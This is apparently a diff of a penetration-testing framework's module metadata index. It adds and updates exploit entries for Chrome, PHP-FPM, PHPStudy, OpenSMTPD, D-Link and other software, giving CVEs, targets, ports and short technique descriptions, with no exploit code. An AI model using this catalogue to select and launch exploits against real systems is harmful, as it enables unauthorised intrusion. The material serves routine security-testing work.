+    "author": [
+      "s1kr10s",
+      "secenv"
+    ],
+    "description": "D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.",
+    "references": [
+      "CVE-2019-20215",
+      "URL-https://medium.com/@s1kr10s/2e799acb8a73"
+    ],
+    "platform": "Linux",
+    "arch": "mipsbe",
+    "rport": "1900",
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2020-02-05 11:53:51 +0000",
+    "path": "/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb",
+    "is_install_path": true,
+    "ref_name": "linux/upnp/dlink_dir859_exec_ssdpcgi",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/upnp/dlink_dir859_subscribe_exec": {
    "name": "D-Link DIR-859 Unauthenticated Remote Command Execution",
    "fullname": "exploit/linux/upnp/dlink_dir859_subscribe_exec",
@@ -64807,7 +64825,7 @@
      "CVE-2013-0230",
      "OSVDB-89624",
      "BID-57608",
-      "URL-https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
+      "URL-https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
    ],
    "platform": "Linux",
    "arch": "x86, mipsbe",
@@ -64831,7 +64849,7 @@
      "Debian GNU/Linux 6.0 / MiniUPnPd 1.0",
      "Airties RT-212 v1.2.0.23 / MiniUPnPd 1.0"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb",
    "is_install_path": true,
    "ref_name": "linux/upnp/miniupnpd_soap_bof",
@@ -65252,6 +65270,141 @@
    },
    "needs_cleanup": null
  },
+  "exploit_multi/browser/chrome_array_map": {
+    "name": "Google Chrome 72 and 73 Array.map exploit",
+    "fullname": "exploit/multi/browser/chrome_array_map",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2019-03-07",
+    "type": "exploit",
+    "author": [
+      "dmxcsnsbh",
+      "István Kurucsai",
+      "timwr"
+    ],
+    "description": "This module exploits an issue in Chrome 73.0.3683.86 (64 bit).\n      The exploit corrupts the length of a float in order to modify the backing store\n      of a typed array. The typed array can then be used to read and write arbitrary\n      memory. The exploit then uses WebAssembly in order to allocate a region of RWX\n      memory, which is then replaced with the payload.\n        The payload is executed within the sandboxed renderer process, so the browser\n      must be run with the --no-sandbox option for the payload to work correctly.",
+    "references": [
+      "CVE-2019-5825",
+      "URL-https://bugs.chromium.org/p/chromium/issues/detail?id=941743",
+      "URL-https://github.com/exodusintel/Chromium-941743",
+      "URL-https://blog.exodusintel.com/2019/09/09/patch-gapping-chrome/",
+      "URL-https://lordofpwn.kr/cve-2019-5825-v8-exploit/"
+    ],
+    "platform": "OSX,Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-02-15 10:37:15 +0000",
+    "path": "/modules/exploits/multi/browser/chrome_array_map.rb",
+    "is_install_path": true,
+    "ref_name": "multi/browser/chrome_array_map",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
+  "exploit_multi/browser/chrome_jscreate_sideeffect": {
+    "name": "Google Chrome 80 JSCreate side-effect type confusion exploit",
+    "fullname": "exploit/multi/browser/chrome_jscreate_sideeffect",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2020-02-19",
+    "type": "exploit",
+    "author": [
+      "Clément Lecigne",
+      "István Kurucsai",
+      "Vignesh S Rao",
+      "timwr"
+    ],
+    "description": "This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit\n      corrupts the length of a float array (float_rel), which can then be used for out\n      of bounds read and write on adjacent memory.\n      The relative read and write is then used to modify a UInt64Array (uint64_aarw)\n      which is used for read and writing from absolute memory.\n      The exploit then uses WebAssembly in order to allocate a region of RWX memory,\n      which is then replaced with the payload shellcode.\n      The payload is executed within the sandboxed renderer process, so the browser\n      must be run with the --no-sandbox option for the payload to work correctly.",
+    "references": [
+      "CVE-2020-6418",
+      "URL-https://bugs.chromium.org/p/chromium/issues/detail?id=1053604",
+      "URL-https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping",
+      "URL-https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"
+    ],
+    "platform": "",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows 10 - Google Chrome 80.0.3987.87 (64 bit)",
+      "macOS - Google Chrome 80.0.3987.87 (64 bit)"
+    ],
+    "mod_time": "2020-03-04 21:23:53 +0000",
+    "path": "/modules/exploits/multi/browser/chrome_jscreate_sideeffect.rb",
+    "is_install_path": true,
+    "ref_name": "multi/browser/chrome_jscreate_sideeffect",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
+  "exploit_multi/browser/chrome_object_create": {
+    "name": "Google Chrome 67, 68 and 69 Object.create exploit",
+    "fullname": "exploit/multi/browser/chrome_object_create",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2018-09-25",
+    "type": "exploit",
+    "author": [
+      "saelo",
+      "timwr"
+    ],
+    "description": "This modules exploits a type confusion in Google Chromes JIT compiler.\n      The Object.create operation can be used to cause a type confusion between a\n      PropertyArray and a NameDictionary.\n        The payload is executed within the rwx region of the sandboxed renderer\n      process, so the browser must be run with the --no-sandbox option for the\n      payload to work.",
+    "references": [
+      "CVE-2018-17463",
+      "URL-http://www.phrack.org/papers/jit_exploitation.html",
+      "URL-https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce",
+      "URL-https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf",
+      "URL-https://bugs.chromium.org/p/chromium/issues/detail?id=888923"
+    ],
+    "platform": "OSX,Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-02-15 06:09:55 +0000",
+    "path": "/modules/exploits/multi/browser/chrome_object_create.rb",
+    "is_install_path": true,
+    "ref_name": "multi/browser/chrome_object_create",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_multi/browser/firefox_escape_retval": {
    "name": "Firefox 3.5 escape() Return Value Memory Corruption",
    "fullname": "exploit/multi/browser/firefox_escape_retval",
@@ -65400,7 +65553,7 @@
      "CVE-2014-8636",
      "CVE-2015-0802",
      "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=1120261",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636"
+      "URL-https://blog.rapid7.com/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636"
    ],
    "platform": "",
    "arch": "",
@@ -65415,7 +65568,7 @@
      "Universal (Javascript XPCOM Shell)",
      "Native Payload"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/browser/firefox_proxy_prototype.rb",
    "is_install_path": true,
    "ref_name": "multi/browser/firefox_proxy_prototype",
@@ -65708,7 +65861,7 @@
      "URL-http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx",
      "URL-http://schierlm.users.sourceforge.net/TypeConfusion.html",
      "URL-https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/03/29/cve-2012-0507--java-strikes-again"
+      "URL-https://blog.rapid7.com/2012/03/29/cve-2012-0507--java-strikes-again"
    ],
    "platform": "Java,Linux,OSX,Solaris,Windows",
    "arch": "",
@@ -65726,7 +65879,7 @@
      "Mac OS X x86 (Native Payload)",
      "Linux x86 (Native Payload)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/browser/java_atomicreferencearray.rb",
    "is_install_path": true,
    "ref_name": "multi/browser/java_atomicreferencearray",
@@ -65903,7 +66056,7 @@
      "URL-http://labs.alienvault.com/labs/index.php/2012/new-java-0day-exploited-in-the-wild/",
      "URL-http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html",
      "URL-http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/08/27/lets-start-the-week-with-a-new-java-0day",
+      "URL-https://blog.rapid7.com/2012/08/27/lets-start-the-week-with-a-new-java-0day",
      "URL-https://bugzilla.redhat.com/show_bug.cgi?id=852051"
    ],
    "platform": "Java,Linux,Windows",
@@ -65920,7 +66073,7 @@
      "Windows Universal",
      "Linux x86"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/browser/java_jre17_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/browser/java_jre17_exec",
@@ -67415,7 +67568,7 @@
    "references": [
      "CVE-2016-5641",
      "URL-http://github.com/swagger-api/swagger-codegen",
-      "URL-https://community.rapid7.com/community/infosec/blog/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641"
+      "URL-https://blog.rapid7.com/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641"
    ],
    "platform": "Java,NodeJS,PHP,Ruby",
    "arch": "nodejs, php, java, ruby",
@@ -67432,7 +67585,7 @@
      "Java JSP",
      "Ruby"
    ],
-    "mod_time": "2018-07-12 17:34:52 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/fileformat/swagger_param_inject.rb",
    "is_install_path": true,
    "ref_name": "multi/fileformat/swagger_param_inject",
@@ -69398,7 +69551,7 @@
    "references": [
      "URL-http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/",
      "URL-https://github.com/rapid7/metasploit-framework/pull/2461",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/03/gestioip-authenticated-remote-command-execution-module"
+      "URL-https://blog.rapid7.com/2013/10/03/gestioip-authenticated-remote-command-execution-module"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -69421,7 +69574,7 @@
    "targets": [
      "Automatic GestioIP 3.0"
    ],
-    "mod_time": "2018-08-09 23:34:03 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/http/gestioip_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/gestioip_exec",
@@ -69496,7 +69649,7 @@
    "description": "This module exploits CVE-2014-9390, which affects Git (versions less\n        than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions\n        less than 3.2.3) and describes three vulnerabilities.\n\n        On operating systems which have case-insensitive file systems, like\n        Windows and OS X, Git clients can be convinced to retrieve and\n        overwrite sensitive configuration files in the .git\n        directory which can allow arbitrary code execution if a vulnerable\n        client can be convinced to perform certain actions (for example,\n        a checkout) against a malicious Git repository.\n\n        A second vulnerability with similar characteristics also exists in both\n        Git and Mercurial clients, on HFS+ file systems (Mac OS X) only, where\n        certain Unicode codepoints are ignorable.\n\n        The third vulnerability with similar characteristics only affects\n        Mercurial clients on Windows, where Windows \"short names\"\n        (MS-DOS-compatible 8.3 format) are supported.\n\n        Today this module only truly supports the first vulnerability (Git\n        clients on case-insensitive file systems) but has the functionality to\n        support the remaining two with a little work.",
    "references": [
      "CVE-2014-9390",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial",
+      "URL-https://blog.rapid7.com/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial",
      "URL-http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html",
      "URL-http://article.gmane.org/gmane.linux.kernel/1853266",
      "URL-https://github.com/blog/1938-vulnerability-announced-update-your-git-clients",
@@ -69518,7 +69671,7 @@
      "Automatic",
      "Windows Powershell"
    ],
-    "mod_time": "2018-10-18 11:24:54 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/http/git_client_command_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/git_client_command_exec",
@@ -70303,7 +70456,7 @@
    "description": "ISPConfig allows an authenticated administrator to export language settings into a PHP script\n      which is intended to be reuploaded later to restore language settings. This feature\n      can be abused to run aribitrary PHP code remotely on the ISPConfig server.\n\n      This module was tested against version 3.0.5.2.",
    "references": [
      "CVE-2013-3629",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -70326,7 +70479,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-08-28 20:17:58 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/http/ispconfig_php_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/ispconfig_php_exec",
@@ -70667,7 +70820,7 @@
      "Unix In-Memory",
      "Java Dropper"
    ],
-    "mod_time": "2019-05-30 00:06:10 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
    "path": "/modules/exploits/multi/http/jenkins_metaprogramming.rb",
    "is_install_path": true,
    "ref_name": "multi/http/jenkins_metaprogramming",
@@ -71665,7 +71818,7 @@
    "description": "This module exploits the Web UI for Metasploit Community, Express and\n        Pro where one of a certain set of Weekly Releases have been applied.\n        These Weekly Releases introduced a static secret_key_base value.\n        Knowledge of the static secret_key_base value allows for\n        deserialization of a crafted Ruby Object, achieving code execution.\n\n        This module is based on\n        exploits/multi/http/rails_secret_deserialization",
    "references": [
      "OVE-20160904-0002",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401",
+      "URL-https://blog.rapid7.com/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401",
      "URL-https://github.com/justinsteven/advisories/blob/master/2016_metasploit_rce_static_key_deserialization.md"
    ],
    "platform": "Ruby",
@@ -71689,7 +71842,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/http/metasploit_static_secret_key_base.rb",
    "is_install_path": true,
    "ref_name": "multi/http/metasploit_static_secret_key_base",
@@ -71918,7 +72071,7 @@
    "references": [
      "CVE-2013-3630",
      "EDB-28174",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
    ],
    "platform": "Linux,Unix",
    "arch": "cmd",
@@ -71941,7 +72094,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-05-10 14:02:01 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/http/moodle_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/moodle_cmd_exec",
@@ -72075,7 +72228,7 @@
    "description": "NAS4Free allows an authenticated user to post PHP code to a special HTTP script and have\n      the code executed remotely. This module was successfully tested against NAS4Free version\n      9.1.0.1.804. Earlier builds are likely to be vulnerable as well.",
    "references": [
      "CVE-2013-3631",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -72098,7 +72251,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/http/nas4free_php_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/nas4free_php_exec",
@@ -72657,7 +72810,7 @@
    "description": "OpenMediaVault allows an authenticated user to create cron jobs as arbitrary users on the system.\n      An attacker can abuse this to run arbitrary commands as any user available on the system (including root).",
    "references": [
      "CVE-2013-3632",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
    ],
    "platform": "Linux,Unix",
    "arch": "cmd",
@@ -72680,7 +72833,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-08-28 20:17:58 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/http/openmediavault_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/openmediavault_cmd_exec",
@@ -73275,6 +73428,70 @@
    },
    "needs_cleanup": null
  },
+  "exploit_multi/http/php_fpm_rce": {
+    "name": "PHP-FPM Underflow RCE",
+    "fullname": "exploit/multi/http/php_fpm_rce",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-10-22",
+    "type": "exploit",
+    "author": [
+      "neex",
+      "cdelafuente-r7"
+    ],
+    "description": "This module exploits an underflow vulnerability in versions 7.1.x\n          below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 of PHP-FPM on\n          Nginx. Only servers with certains Nginx + PHP-FPM configurations are\n          exploitable. This is a port of the original neex's exploit code (see\n          refs.). First, it detects the correct parameters (Query String Length\n          and custom header length) needed to trigger code execution. This step\n          determines if the target is actually vulnerable (Check method). Then,\n          the exploit sets a series of PHP INI directives to create a file\n          locally on the target, which enables code execution through a query\n          string parameter. This is used to execute normal payload stagers.\n          Finally, this module does some cleanup by killing local PHP-FPM\n          workers (those are spawned automatically once killed) and removing\n          the created local file.",
+    "references": [
+      "CVE-2019-11043",
+      "EDB-47553",
+      "URL-https://github.com/neex/phuip-fpizdam",
+      "URL-https://bugs.php.net/bug.php?id=78599",
+      "URL-https://blog.orange.tw/2019/10/an-analysis-and-thought-about-recently.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP",
+      "Shell Command"
+    ],
+    "mod_time": "2020-03-06 17:38:37 +0000",
+    "path": "/modules/exploits/multi/http/php_fpm_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/php_fpm_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-restarts"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_multi/http/php_utility_belt_rce": {
    "name": "PHP Utility Belt Remote Code Execution",
    "fullname": "exploit/multi/http/php_utility_belt_rce",
@@ -73866,6 +74083,55 @@
    },
    "needs_cleanup": null
  },
+  "exploit_multi/http/phpstudy_backdoor_rce": {
+    "name": "PHPStudy Backdoor Remote Code execution",
+    "fullname": "exploit/multi/http/phpstudy_backdoor_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-09-20",
+    "type": "exploit",
+    "author": [
+      "Dimensional",
+      "Airevan"
+    ],
+    "description": "This module can detect and exploit the backdoor of PHPStudy.",
+    "references": [
+      "URL-https://programmer.group/using-ghidra-to-analyze-the-back-door-of-phpstudy.html"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHPStudy 2016-2018"
+    ],
+    "mod_time": "2020-03-05 10:24:22 +0000",
+    "path": "/modules/exploits/multi/http/phpstudy_backdoor_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/phpstudy_backdoor_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_multi/http/phptax_exec": {
    "name": "PhpTax pfilez Parameter Exec Remote Code Injection",
    "fullname": "exploit/multi/http/phptax_exec",
@@ -74764,7 +75030,7 @@
    "references": [
      "CVE-2013-0156",
      "OSVDB-89026",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156"
+      "URL-https://blog.rapid7.com/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156"
    ],
    "platform": "Ruby",
    "arch": "ruby",
@@ -74787,7 +75053,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/rails_xml_yaml_code_exec",
@@ -77319,7 +77585,7 @@
    "description": "vTiger CRM allows an authenticated user to upload files to embed within documents.\n      Due to insufficient privileges on the 'files' upload folder, an attacker can upload a PHP\n      script and execute arbitrary PHP code remotely.\n\n      This module was tested against vTiger CRM v5.4.0 and v5.3.0.",
    "references": [
      "CVE-2013-3591",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -77342,7 +77608,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-09-08 10:04:47 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/http/vtiger_php_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/vtiger_php_exec",
@@ -77878,7 +78144,7 @@
    "description": "ZABBIX allows an administrator to create scripts that will be run on hosts.\n      An authenticated attacker can create a script containing a payload, then a host\n      with an IP of 127.0.0.1 and run the arbitrary script on the ZABBIX host.\n\n      This module was tested against Zabbix v2.0.9.",
    "references": [
      "CVE-2013-3628",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
    ],
    "platform": "Linux,Unix",
    "arch": "cmd",
@@ -77901,7 +78167,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-09-07 21:18:50 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/http/zabbix_script_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/zabbix_script_exec",
@@ -80834,7 +81100,7 @@
      "Linux",
      "Mac OS X"
    ],
-    "mod_time": "2020-01-09 15:02:04 +0000",
+    "mod_time": "2020-02-19 09:32:34 +0000",
    "path": "/modules/exploits/multi/script/web_delivery.rb",
    "is_install_path": true,
    "ref_name": "multi/script/web_delivery",
@@ -80970,7 +81236,7 @@
      "CVE-2012-5958",
      "OSVDB-89611",
      "US-CERT-VU-922681",
-      "URL-https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
+      "URL-https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -80987,7 +81253,7 @@
      "Axis Camera M1011 5.20.1 UPnP/1.4.1",
      "Debug Target"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb",
    "is_install_path": true,
    "ref_name": "multi/upnp/libupnp_ssdp_overflow",
@@ -81398,7 +81664,7 @@
    "targets": [
      "Mac OS X"
    ],
-    "mod_time": "2019-02-09 18:46:35 +0000",
+    "mod_time": "2020-02-26 10:39:50 +0000",
    "path": "/modules/exploits/osx/browser/adobe_flash_delete_range_tl_op.rb",
    "is_install_path": true,
    "ref_name": "osx/browser/adobe_flash_delete_range_tl_op",
@@ -84745,7 +85011,7 @@
      "Cliff Stoll",
      "wvu <wvu@metasploit.com>"
    ],
-    "description": "This module exploits a SUID installation of the Emacs movemail utility\n        to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.\n        The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.",
+    "description": "This module exploits a SUID installation of the Emacs movemail utility\n        to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.\n\n        The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.",
    "references": [
      "URL-https://en.wikipedia.org/wiki/Movemail",
      "URL-https://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg",
@@ -84766,7 +85032,7 @@
    "targets": [
      "/usr/lib/crontab.local"
    ],
-    "mod_time": "2018-12-03 12:22:40 +0000",
+    "mod_time": "2020-02-05 17:21:47 +0000",
    "path": "/modules/exploits/unix/local/emacs_movemail.rb",
    "is_install_path": true,
    "ref_name": "unix/local/emacs_movemail",
@@ -84862,6 +85128,56 @@
    },
    "needs_cleanup": true
  },
+  "exploit_unix/local/opensmtpd_oob_read_lpe": {
+    "name": "OpenSMTPD OOB Read Local Privilege Escalation",
+    "fullname": "exploit/unix/local/opensmtpd_oob_read_lpe",
+    "aliases": [
+
+    ],
+    "rank": 200,
+    "disclosure_date": "2020-02-24",
+    "type": "exploit",
+    "author": [
+      "Qualys",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits an out-of-bounds read of an attacker-controlled\n        string in OpenSMTPD's MTA implementation to execute a command as the\n        root or nobody user, depending on the kind of grammar OpenSMTPD uses.",
+    "references": [
+      "CVE-2020-8794",
+      "URL-https://seclists.org/oss-sec/2020/q1/96"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "OpenSMTPD < 6.6.4 (automatic grammar selection)"
+    ],
+    "mod_time": "2020-03-03 16:50:39 +0000",
+    "path": "/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb",
+    "is_install_path": true,
+    "ref_name": "unix/local/opensmtpd_oob_read_lpe",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_unix/local/setuid_nmap": {
    "name": "Setuid Nmap Exploit",
    "fullname": "exploit/unix/local/setuid_nmap",
@@ -85276,7 +85592,7 @@
      "Cliff Stoll",
      "wvu <wvu@metasploit.com>"
    ],
-    "description": "This module exploits sendmail's well-known historical debug mode to\n        escape to a shell and execute commands in the SMTP RCPT TO command.\n\n        This vulnerability was exploited by the Morris worm in 1988-11-02.\n        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.\n\n        Currently only cmd/unix/reverse and cmd/unix/generic are supported.",
+    "description": "This module exploits sendmail's well-known historical debug mode to\n        escape to a shell and execute commands in the SMTP RCPT TO command.\n\n        This vulnerability was exploited by the Morris worm in 1988-11-02.\n        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.\n\n        Currently, only cmd/unix/reverse and cmd/unix/generic are supported.",
    "references": [
      "URL-https://en.wikipedia.org/wiki/Morris_worm",
      "URL-https://spaf.cerias.purdue.edu/tech-reps/823.pdf",
@@ -85295,7 +85611,7 @@
    "targets": [
      "@(#)version.c       5.51 (Berkeley) 5/2/86"
    ],
-    "mod_time": "2019-12-23 19:02:13 +0000",
+    "mod_time": "2020-02-05 19:13:19 +0000",
    "path": "/modules/exploits/unix/smtp/morris_sendmail_debug.rb",
    "is_install_path": true,
    "ref_name": "unix/smtp/morris_sendmail_debug",
@@ -85306,6 +85622,57 @@
    },
    "needs_cleanup": null
  },
+  "exploit_unix/smtp/opensmtpd_mail_from_rce": {
+    "name": "OpenSMTPD MAIL FROM Remote Code Execution",
+    "fullname": "exploit/unix/smtp/opensmtpd_mail_from_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-01-28",
+    "type": "exploit",
+    "author": [
+      "Qualys",
+      "wvu <wvu@metasploit.com>",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "This module exploits a command injection in the MAIL FROM field during\n          SMTP interaction with OpenSMTPD to execute a command as the root user.",
+    "references": [
+      "CVE-2020-7247",
+      "URL-https://seclists.org/oss-sec/2020/q1/40"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 25,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "OpenSMTPD < 6.6.1"
+    ],
+    "mod_time": "2020-03-05 14:48:37 +0000",
